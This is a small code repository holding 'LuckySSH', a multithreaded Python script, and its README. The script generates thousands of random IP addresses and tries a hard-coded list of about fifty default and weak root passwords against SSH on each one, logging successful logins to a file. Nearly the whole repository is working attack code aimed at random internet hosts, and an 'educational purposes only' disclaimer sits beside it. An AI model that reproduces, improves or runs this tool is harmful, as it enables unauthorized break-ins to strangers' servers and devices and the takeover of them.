├── LuckySSH.py
└── README.md
/LuckySSH.py:
--------------------------------------------------------------------------------
1 | #!/usr/local/bin/python3
2 | #encoding: utf-8
3 | #name: LuckySSH v1
4 | #author: DrPython3 @ GitHub.com
5 |
6 | # <<---------------------------------------------------------------------------------------------------------------->>
7 |
8 | '''
9 | On a boring Sunday, I decided to write ...
10 |
11 | #### [ LuckySSH v1 ] ####
12 |
13 | This simple SSH bruteforcer spits out a number on startup, generates that amount of
14 | random IP addresses and tries to find active SSH-services with weak root logins, then.
15 |
16 | '''
17 |
18 | import random, paramiko, threading, os, sys, time
19 | from random import randint
20 | from time import sleep
21 | import colorama
22 | from colorama import *
23 | init()
24 | print(Fore.WHITE + '')
25 |
26 | # <<---------------------------------------------------------------------------------------------------------------->>
27 |
28 | '''
29 | +-------------------------+
30 | | Various stuff following |
31 | +-------------------------+
32 | '''
33 |
34 | # logo:
35 | logo = '''
36 | ___________________________________________________________________________________
37 |
38 | .-. .-') .-') .-') ('-. .-.
39 | \ ( OO ) ( OO ). ( OO ). ( OO ) /
40 | ,--. ,--. ,--. .-----. ,--. ,--. ,--. ,--.(_)---\_)(_)---\_),--. ,--.
41 | | |.-') | | | | ' .--./ | .' / \ `.' / / _ | / _ | | | | |
42 | | | OO )| | | .-') | |('-. | /, .-') / \ :` `. \ :` `. | .| |
43 | | |`-' || |_|( OO )/_) |OO )| ' _)(OO \ / '..`''.) '..`''.)| |
44 | (| '---.'| | | `-' /|| |`-'| | . \ | / /\_ .-._) \.-._) \| .-. |
45 | | |(' '-'(_.-'(_' '--'\ | |\ \ `-./ /.__) \ /\ /| | | |
46 | `------' `-----' `-----' `--' '--' `--' `-----' `-----' `--' `--'
47 |
48 | [[ LuckySSH v1 by DrPython3 @ GitHub.com -+#+- (!) FOR EDUCATIONAL PURPOSES ONLY ]]
49 |
50 | Get your lucky number and try your luck on bruteforcing that amount of random IPs
51 | with this little tool ... HITS are saved to the file "hits.txt".
52 | ___________________________________________________________________________________
53 |
54 | LIKE THIS TOOL? BUY ME A COFFEE OR DONATE, PLEASE!
55 |
56 | WALLET (BTC): 19YMv87wkr8K7AJywxqHBrjCs4e8N2ngHT
57 | ___________________________________________________________________________________'''
58 |
59 | # variables:
60 | lucky_number = 0
61 | checkshit = 0
62 | checksbad = 0
63 | # default timeout for SSH client:
64 | default_timeout = float(5.0)
65 | # amount of attacking threads:
66 | attack_threads = 10
67 | targetips = []
68 | weakwords = [
69 | 'root:root','root:toor','root:raspberry','root:test','root:uploader','root:password','root:admin',
70 | 'root:administrator','root:marketing','root:12345678','root:1234','root:12345','root:qwerty','root:webadmin',
71 | 'root:webmaster','root:maintaince','root:techsupport','root:letmein','root:logon','root:Passw@rd','root:calvin',
72 | 'root:qwasyx21','root:default','root:leostream','root:rootpasswd','root:timeserver','root:p@ck3tf3nc3','root:linux',
73 | 'root:5up''root:uClinux','root:alpine','root:dottie','root:arcsight','root:unitrends1','root:vagrant','root:fai',
74 | 'root:ceadmin','root:palosanto','root:ubuntu1404','root:cubox-i','root:debian','root:xoa','root:sipwise',
75 | 'root:sixaola','root:screencast','root:stxadmin','root:nosoup4u','root:indigo','root:video','root:ubnt']
76 |
77 | # <<---------------------------------------------------------------------------------------------------------------->>
78 |
79 | '''
80 | +--------------------------------------------+
81 | | Functions needed for performing the attack |
82 | +--------------------------------------------+
83 | '''
84 |
85 | # clean screen on purpose:
86 | def clean():
87 | try:
88 | if os.name == 'nt':
89 | os.system('cls')
90 | else:
91 | os.system('clear')
92 | except: pass
93 |
94 | # luckynumber() determins the amount of IP addresses to check:
95 | def luckynumber():
96 | X = int(randint(666, 6666))
97 | return X
98 |
99 | # ipwriter() saves the random IPs to a file:
100 | def ipwriter(boring):
101 | with open('targets.txt', 'a') as targets:
102 | targets.write(str(boring) + '\n')
103 | targets.close()
104 |
105 | # write hits to a file:
106 | def hits(sunday):
107 | with open('hits.txt', 'a') as hitsfile:
108 | hitsfile.write(str(sunday) + '\n')
109 | hitsfile.close()
110 |
111 | # ipgen() generates random ip addresses to attack:
112 | def ipgen(bodycount):
113 | print(Fore.WHITE + 'Generating that amount of random IP addresses for you. Please wait (...)\n')
114 | try:
115 | X = int(bodycount)
116 | while X > 0:
117 | # generate 4 random numbers:
118 | r1 = int(randint(1, 255))
119 | r2 = int(randint(0, 255))
120 | r3 = int(randint(0, 255))
121 | r4 = int(randint(1, 255))
122 | randomip = (str(
123 | # combine the 4 random numbers to an IP:
124 | str(r1) + '.' + str(r2) + '.' + str(r3) + '.' + str(r4)
125 | ))
126 | # write random IP to file:
127 | ipwriter(str(randomip))
128 | X -= 1
129 | print(Fore.LIGHTGREEN_EX + 'Random IP addresses are ready for an attack now (...)\n')
130 | return True
131 | except:
132 | return False
133 |
134 | # countdown() ...yes, it counts down starting with "5":
135 | def countdown():
136 | z = int(5)
137 | while z > 0:
138 | print(Fore.LIGHTYELLOW_EX + '... ' + str(z))
139 | sleep(0.9)
140 | z -= 1
141 | return None
142 |
143 | # invader() is the SSH-client the bruter() will use:
144 | def invader(ip, user, passwd):
145 | # configure SSH-client:
146 | invader = paramiko.SSHClient()
147 | invader.set_missing_host_key_policy(paramiko.AutoAddPolicy())
148 | # try to establish a connection:
149 | try:
150 | invader.connect(hostname=str(ip), port=int(22), username=str(user), password=str(passwd), timeout=float(default_timeout))
151 | invader.close()
152 | # in case of successful attack, tell bruter "True":
153 | return True
154 | except:
155 | return False
156 |
157 | # bruter() attacks the targets:
158 | def bruter():
159 | global checkshit
160 | global checksbad
161 | global targetips
162 | # start loop:
163 | while len(targetips) > 0:
164 | check_result = False
165 | try:
166 | # get (next) target:
167 | victim = targetips.pop(0)
168 | print(Fore.WHITE + 'Attacking -->> TARGET: ' + str(victim) + ' ...\n')
169 | # start loop to work on userpass-combolist:
170 | for i in weakwords:
171 | # get (next) credentials:
172 | userpass = []
173 | userpass = i.split(':')
174 | user = str(userpass[0])
175 | passwd = str(userpass[1])
176 | # try connection and auth:
177 | check_result = (invader(str(victim), str(user), str(passwd)))
178 | # handle the result:
179 | if check_result == True:
180 | hits(str('HOST: ') + str(victim) + ':22, USER: ' + str(user) + ', PASS: ' + str(passwd))
181 | print(Fore.LIGHTGREEN_EX + '(!) SUCCESS (!) -->> hit on TARGET: ' + str(victim) + '\n')
182 | break
183 | else:
184 | print(Fore.LIGHTRED_EX + '(!) FAIL FOR (!) -->> ' + str(victim) + ':' + str(user) + ':'
185 | + str(passwd) + ' ...\n')
186 | continue
187 | if check_result == True:
188 | checkshit += 1
189 | else:
190 | checksbad += 1
191 | except:
192 | print(Fore.LIGHTRED_EX + 'Attack on target: ' + str(victim) + ' failed ...\n')
193 | checksbad += 1
194 | continue
195 |
196 | # <<---------------------------------------------------------------------------------------------------------------->>
197 |
198 | '''
199 | +---------------------------+
200 | | << (!) STARTUP (!) >> |
201 | +---------------------------+
202 | '''
203 |
204 | # clean screen and print logo, then:
205 | clean()
206 | print(Fore.LIGHTRED_EX + Style.BRIGHT + logo)
207 | # get lucky number for user, tell about and generate random IPs:
208 | lucky_number = int(luckynumber())
209 | print(Fore.WHITE + '\nYour lucky number is: ' + Fore.LIGHTGREEN_EX + str(lucky_number) + ' ...\n')
210 | generator_status = ipgen(int(lucky_number))
211 | if generator_status == False:
212 | clean()
213 | sys.exit(Fore.LIGHTRED_EX + '\n\n(!) AN ERROR OCCURRED (!) when generating IPs ... sorry, bye!\n\n')
214 | else:
215 | # start the attack:
216 | print(Fore.LIGHTGREEN_EX + 'Starting attack in ...\n')
217 | countdown()
218 | clean()
219 | # fetch random IPs into targetlist:
220 | targetips = open('targets.txt', 'r').read().splitlines()
221 | # start bruter() multi-threaded:
222 | for _ in range(int(attack_threads)):
223 | threading.Thread(target=bruter).start()
224 | # show stats in window title while bruteforce attack is ongoing:
225 | while len(targetips) > 0:
226 | try:
227 | sleep(0.1)
228 | wintitle = str('TO CHECK: ' + str(len(targetips)) + ' | HITS: ' + str(checkshit) + ' | BAD: ' + str(checksbad))
229 | sys.stdout.write('\33]0;' + str(wintitle) + '\a')
230 | sys.stdout.flush()
231 | except: pass
232 |
233 | # DrPython3 (C) 2020
234 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # LuckySSH
2 |
3 | A Little Bruteforce Tool for Pentester's Lucky Days targeting SSH-Services!
4 |
5 | Legal Notices
6 |
7 | For educational purposes only. Neither use for any kind of illegal activity
8 | nor law enforcement.
9 |
10 | More Information ...
11 |
12 | A product of a boring Sunday:
13 | Once started, LuckySSH generates a random number and that amount of
14 | random IPs. Those IPs are checked for an active SSH-service, then.
15 | If an active SSH-service is found, the tool starts a common bruteforce
16 | attack using most common user:pass combinations.
17 |
18 |
19 | Hits are saved to: "hits.txt", stats are shown in window title.
20 | The amount of IPs being is picked from a range 666 up to 6666.
21 |
22 | Like it? So, ...
23 |
24 | If you like this tiny tool, buy me a coffee or donate!
25 |
26 | WALLET (BTC): 19YMv87wkr8K7AJywxqHBrjCs4e8N2ngHT
27 |
28 |
29 |
30 | All donations are much appreciated though coffee even more ... (^o^)
31 |
32 | Best wishes,
33 | DrPython3
34 |
35 | Final notes ...
36 |
37 | I have not tested the code very often - as said above,
38 | this is a quick release just because of a boring day!
39 |
40 |
--------------------------------------------------------------------------------